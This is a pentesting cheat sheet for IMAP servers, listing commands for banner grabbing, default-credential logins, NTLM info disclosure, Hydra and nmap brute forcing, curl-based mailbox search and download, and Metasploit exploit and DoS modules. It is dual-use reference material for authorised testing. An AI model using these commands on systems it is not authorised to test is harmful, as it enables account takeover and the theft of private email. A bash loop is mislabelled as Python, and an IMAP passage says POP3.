IMAP Pentesting Best Practices

IMAP

IMAP usually uses ports 143, 993

What is IMAP?

Internet Message Access Protocol (IMAP) is then used by the recipient’s email client to fetch your message from the email server and put it in their inbox.

• Port 143 - this is the default IMAP non-encrypted port
• Port 993 - this is the port you need to use if you want to connect using IMAP securely

PORT     STATE SERVICE               VERSION
143/tcp  open  imap                  Dovecot imapd (Ubuntu)

IMAP Pentesting

Shodan search query :
port:143, 993
port:143 CAPABILITY
port:993 CAPABILITY

Banner Grabbing

# Banner grabbing and test connection
nc -nv IP 143
A1 LOGIN “root” “”
A1 LOGIN root toor
A1 LOGIN root root

nmap -p143 -sV --script=banner 192.168.x.x
nmap -p143 --script=imap-ntlm-info 192.168.x.x
msf > use auxiliary/scanner/imap/imap_version
openssl s_client -connect 192.168.x.x:993 -quiet
telnet 192.168.x.x 143

According to the answers to the sent queries, the features of the POP3 implementation (commands, etc.) can be determined.

nmap -sV --script=imap-capabilities -p143 10.10.x.x

Capturing IMAP Traffic

msf > use auxiliary/server/capture/imap

NTLM Auth - Information disclosure

If the server supports NTLM auth (Windows) you can obtain sensitive info (versions):

root@kali: telnet example.com 143 
* OK The Microsoft Exchange IMAP4 service is ready. 
>> a1 AUTHENTICATE NTLM 
+ 
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 
+ TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA

Or automate this with nmap plugin imap-ntlm-info.nse

Brute Forcing

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f 192.168.x.x imap -V
nmap --script=imap-brute –script-args userdb=Users.list,passdb=Passwords.list -p143 192.168.x.x

Evolution

sudo apt install evolution

CURL

Basic navigation is possible with CURL, but the documentation is light on details so checking the source is recommended for precise details.

# 1. Listing mailboxes (imap command LIST "" "*")
$ curl -k 'imaps://10.10.x.x/' --user user:pass

# 2. Listing messages in a mailbox (imap command SELECT INBOX and then SEARCH ALL)
$ curl -k 'imaps://10.10.x.x/INBOX?ALL' --user user:pass

# The result of this search is a list of message indicies.
# Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:
$ curl -k 'imaps://10.10.x.x/Drafts?TEXT password' --user user:pass

# A nice overview of the search terms possible is located [HERE](https://www.atmail.com/blog/imap-commands/).
# 3. Downloading a message (imap command SELECT Drafts and then FETCH 1 BODY[])
$ curl -k 'imaps://10.10.x.x/Drafts;MAILINDEX=1' --user user:pass

# The mail index will be the same index returned from the search operation.
# It is also possible to use UID (unique id) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g.
$ curl -k 'imaps://10.10.x.x/INBOX' -X 'UID SEARCH ALL' --user user:pass
$ curl -k 'imaps://10.10.x.x/INBOX;UID=1' --user user:pass

#Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages (the -v is required to see the subject and sender):
$ curl -k 'imaps://10.10.x.x/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<'

#Although, its probably cleaner to just write a little for loop (Python):
for m in {1..5}; do
  echo $m
  curl "imap://10.10.x.x/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass
done

IMAP Vulnerabilities

Eudora Qualcomm WorldMail 3.0 [CVE-2005-4267]
msf > use exploit/windows/imap/eudora_list
#IMAP Fuzzer
msf > use auxiliary/dos/windows/imap/fuzz_imap